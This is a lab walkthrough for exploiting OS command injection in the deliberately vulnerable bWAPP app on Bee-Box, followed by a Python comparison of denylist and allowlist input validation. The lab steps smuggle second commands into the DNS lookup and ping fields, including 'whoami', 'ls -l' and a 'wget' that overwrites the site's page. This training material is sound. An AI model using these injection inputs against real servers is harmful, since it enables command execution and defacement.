OS Command Injection
Virtual machines needed:
● Bee-Box Machine
● Kali Linux virtual machine.
Demo 1: OS Command Injection.
Procedure:
1. Switch on both the virtual machines.
2. Now open a terminal on the bee-box machine and use command: “ip a” to get the IP address
of the machine.
3. Now open the kali-linux machine and open a browser and type “http://192.168.1.5/” then
you will see the bWAPP website appearing.
4. Now click on “bWAPP” to move inside the main website.
5. Now you see the “bWAPP” webpage appearing as shown in the screenshot. Now use
username as “bee” and password as “bug”. Then click on Login.
6. Now select “OS Command Injection” from the drop-down menu as shown in the
screenshot. Then click on “Hack”.
7. Then you will see the following page appear, as shown in the screenshot.
8. Now in place of “DNS Lookup” type “yahoo.com” then click on Lookup. Here you will get
all the information related to the searched DNS.
9. Now in the DNS Lookup field type “yahoo.com|time”, then click on Lookup. If the
command runs, the server has an OS command injection vulnerability.
10. Now again use command: “yahoo.com&&time”. Then you will see the following reply
appear.
11. Now change the security level to medium as shown in the screenshot.
12. Now use command: “yahoo.com | whoami”. This command will first perform a DNS
lookup for the domain "yahoo.com" using the nslookup command and then pipe the
output to the whoami command, which will simply return the username of the current
user executing the command.
13. Now use command: “yahoo.com && whoami”. This will first perform the DNS lookup of
yahoo.com and, if that command succeeds, it will then display the username using the
“whoami” command.
14. Now in the DNS Lookup field use command: “www.yahoo.com ; wget http://example.com >>
script.html”. Then click on Lookup.
15. Then you will see the following output appear.
16. Now use “;” and type command “ls -l” to view the files present. Then click on “Lookup”.
17. Then it shows the following output.
18. Now press “CTRL + F” then search for “script.html” to check whether the creation was
successful or not.
19. Now hit enter to search. Then you will see the file present.
20. Now open a browser in your computer and search for “http://192.168.1.5” then you will
see the “example.com” webpage appearing instead of bee-box website.
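The inputs from the steps above, checked against two defensive approaches, as an added example that is not part of the original lab or of bWAPP's code: a hypothetical denylist filter (strip_blacklist) that only deletes “;” and “&”, and an allowlist hostname check that hands nslookup an argument list with no shell. All function names and the denylist itself are assumptions made for illustration.

```python
import re
import subprocess

# Inputs typed into the DNS Lookup field in the steps above.
LAB_INPUTS = [
    "yahoo.com",
    "yahoo.com|time",
    "yahoo.com&&time",
    "yahoo.com | whoami",
    "yahoo.com && whoami",
    "www.yahoo.com ; wget http://example.com >> script.html",
]

# Characters a POSIX shell treats as operators, quoting or expansion.
SHELL_META = set("|&;<>$`(){}\n\\'\"*?~!#")

# RFC 1123 style hostname: dot-separated labels of letters, digits, hyphens.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")


def strip_blacklist(value):
    """Hypothetical denylist filter: delete ';' and '&', keep everything else."""
    return value.replace(";", "").replace("&", "")


def leftover_metachars(value):
    """Shell metacharacters that would still reach `sh -c "nslookup <value>"`."""
    return sorted(SHELL_META.intersection(value))


def build_lookup_argv(value):
    """Allowlist-validate the hostname and return an argv list (no shell)."""
    if len(value) > 253 or not HOSTNAME_RE.fullmatch(value):
        raise ValueError(f"rejected hostname: {value!r}")
    return ["nslookup", value]


def lookup(value):
    """Run the lookup without a shell, so operators are never interpreted."""
    return subprocess.run(build_lookup_argv(value), capture_output=True,
                          text=True, timeout=10, check=False).stdout


if __name__ == "__main__":
    for item in LAB_INPUTS:
        try:
            verdict = build_lookup_argv(item)
        except ValueError as err:
            verdict = str(err)
        print(f"{item!r}: denylist leaves "
              f"{leftover_metachars(strip_blacklist(item))}; allowlist -> {verdict}")
```

The denylist still lets “|” and “>” through, while the allowlist accepts only the plain hostname and rejects every other input in the list.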
Demo 2: OS Command Injection [Blind]
Procedure:
1. Switch on both the virtual machines.
2. Now open a terminal on the bee-box machine and use command: “ip a” to get the IP address
of the machine.
3. Now open the kali-linux machine and open a browser and type “http://192.168.1.5/” then
you will see the bWAPP website appearing.
4. Now click on “bWAPP” to move inside the main website.
5. Now you see the “bWAPP” webpage appearing as shown in the screenshot. Now use
username as “bee” and password as “bug”. Then click on Login.
6. Now select “OS Command Injection Blind” from the drop-down menu as shown in the
screenshot. Then click on “Hack”.
7. Then you will see the following page appear, as shown in the screenshot.
8. Now in the IP address field type “120.0.0.5” and click on “Ping”. You will see a
message appear, but no results are displayed.
9. Now use command: “120.0.0.5 ; cd > injection.txt”. This command redirects the value
returned into the specified text file.